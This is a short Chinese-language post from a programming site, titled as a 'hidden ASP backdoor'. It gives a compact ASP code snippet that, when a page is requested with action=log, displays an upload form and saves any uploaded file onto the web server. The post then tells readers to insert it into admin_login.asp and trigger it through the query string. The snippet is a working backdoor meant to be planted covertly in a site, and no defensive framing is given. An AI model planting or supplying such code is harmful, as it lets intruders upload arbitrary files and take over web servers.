当前位置: 移动技术网 > IT编程>开发语言>Asp > 隐蔽的ASP后门 大家可以查看下

隐蔽的ASP后门 大家可以查看下

2017年12月08日  | 移动技术网IT编程  | 我要评论
复制代码 代码如下: <%if request.querystring("action")="log" then a=request.totalbytes:if a
复制代码 代码如下:

<%if request.querystring("action")="log" then
a=request.totalbytes:if a then b="adodb.stream":set c=createobject(b):c.type=1:c.open:c.write request.binaryread(a):c.position=0:d=c.read:e=chrb(13)&chrb(10):f=instrb(d,e):g=instrb(f+1,d,e):set h=createobject(b):h.type=1:h.open:c.position=f+1:c.copyto h,g-f-3:h.position=0:h.type=2:h.charset="big5":i=h.readtext:h.close:j=mid(i,instrrev(i,"\")+1,g):k=instrb(d,e&e)+4:l=instrb(k+1,d,leftb(d,f-1))-k-2:h.type=1:h.open:c.position=k-1:c.copyto h,l:h.savetofile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>

比如编辑在“admin_login.asp”下
以后只需要输入“admin_login.asp?action=log”即可

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

验证码:
移动技术网